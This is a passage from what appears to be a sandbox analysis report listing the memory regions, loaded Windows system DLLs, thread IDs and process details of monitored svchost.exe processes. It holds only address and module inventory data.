0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6938 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6939 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6940 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6941 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6942 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 6943 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 6944 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6945 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6946 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 6947 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 6948 start_va = 0x7fefc9f0000 end_va = 0x7fefca03fff monitored = 0 entry_point = 0x7fefc9f101c region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 6949 start_va = 0x7fefca10000 end_va = 0x7fefca90fff monitored = 0 entry_point = 0x7fefca1cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 6950 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 6951 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6952 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 6953 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6954 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6955 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 6956 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6957 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6958 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6959 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 6960 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6961 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6962 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6963 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6964 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6965 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6966 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6967 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6968 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6969 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6970 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6971 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6972 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6973 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6974 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6975 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6976 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 6977 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 6978 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 6979 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 6980 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6981 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 6982 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 6983 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 6984 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 6985 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6986 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 353 os_tid = 0xf60 Thread: id = 354 os_tid = 0xefc Thread: id = 355 os_tid = 0x54c Thread: id = 356 os_tid = 0x4c0 Thread: id = 357 os_tid = 0x7f8 Thread: id = 358 os_tid = 0x2b8 Thread: id = 359 os_tid = 0x2b4 Thread: id = 360 os_tid = 0x2ac Thread: id = 361 os_tid = 0x290 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa352000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c378" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 7311 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7312 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 7313 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7314 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7315 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7316 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7317 start_va = 0x140000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 7318 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 7319 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 7320 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 7321 start_va = 0x270000 end_va = 0x27cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 7322 start_va = 0x280000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7323 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 7324 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 7325 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 7326 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 7327 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 7328 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 7329 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 7330 start_va = 0x7a0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 7331 start_va = 0x820000 end_va = 0x821fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 7332 start_va = 0x830000 end_va = 0x831fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 7333 start_va = 0x840000 end_va = 0x841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 7334 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 7335 start_va = 0x860000 end_va = 0x8a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 7336 start_va = 0x8b0000 end_va = 0x8b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cleanmgr.exe-b508fb28.pf" filename = "\\Windows\\Prefetch\\CLEANMGR.EXE-B508FB28.pf" (normalized: "c:\\windows\\prefetch\\cleanmgr.exe-b508fb28.pf") Region: id = 7337 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 7338 start_va = 0x8f0000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rasdlg.dll.mui" filename = "\\Windows\\System32\\en-US\\rasdlg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rasdlg.dll.mui") Region: id = 7339 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 7340 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 7341 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 7342 start_va = 0x940000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 7343 start_va = 0x9c0000 end_va = 0x9c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 7344 start_va = 0x9e0000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 7345 start_va = 0xa60000 end_va = 0xd2efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7346 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 7347 start_va = 0xd80000 end_va = 0xd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 7348 start_va = 0xda0000 end_va = 0xe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 7349 start_va = 0xe70000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 7350 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 7351 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 7352 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 7353 start_va = 0x1160000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 7354 start_va = 0x1230000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 7355 start_va = 0x12d0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 7356 start_va = 0x1350000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 7357 start_va = 0x1430000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 7358 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 7359 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 7360 start_va = 0x1660000 end_va = 0x16dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 7361 start_va = 0x1720000 end_va = 0x179ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 7362 start_va = 0x17a0000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 7363 start_va = 0x1820000 end_va = 0x189ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 7364 start_va = 0x18a0000 end_va = 0x199ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 7365 start_va = 0x19a0000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 7366 start_va = 0x1a20000 end_va = 0x1b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 7367 start_va = 0x1b50000 end_va = 0x1b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 7368 start_va = 0x1c10000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 7369 start_va = 0x1d10000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 7370 start_va = 0x1d20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 7371 start_va = 0x1ed0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 7372 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 7373 start_va = 0x2050000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 7374 start_va = 0x2150000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 7375 start_va = 0x2250000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 7376 start_va = 0x2450000 end_va = 0x2c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 7377 start_va = 0x3480000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 7378 start_va = 0x3880000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 7379 start_va = 0x4080000 end_va = 0x504ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 7380 start_va = 0x5050000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 7381 start_va = 0x75500000 end_va = 0x75502fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 7382 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7383 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7384 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7385 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7386 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7387 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7388 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 7389 start_va = 0x7fef40e0000 end_va = 0x7fef411efff monitored = 0 entry_point = 0x7fef40e12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 7390 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 7391 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 7392 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 7393 start_va = 0x7fef41f0000 end_va = 0x7fef42c7fff monitored = 0 entry_point = 0x7fef4258bd0 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 7394 start_va = 0x7fef42d0000 end_va = 0x7fef432bfff monitored = 0 entry_point = 0x7fef42d8c20 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 7395 start_va = 0x7fef4580000 end_va = 0x7fef480afff monitored = 0 entry_point = 0x7fef4586f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 7396 start_va = 0x7fef4a80000 end_va = 0x7fef4a96fff monitored = 0 entry_point = 0x7fef4a8d308 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 7397 start_va = 0x7fef4aa0000 end_va = 0x7fef4aabfff monitored = 0 entry_point = 0x7fef4aa419c region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 7398 start_va = 0x7fef4af0000 end_va = 0x7fef4bacfff monitored = 0 entry_point = 0x7fef4af1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 7399 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 7400 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 7401 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 7402 start_va = 0x7fef5310000 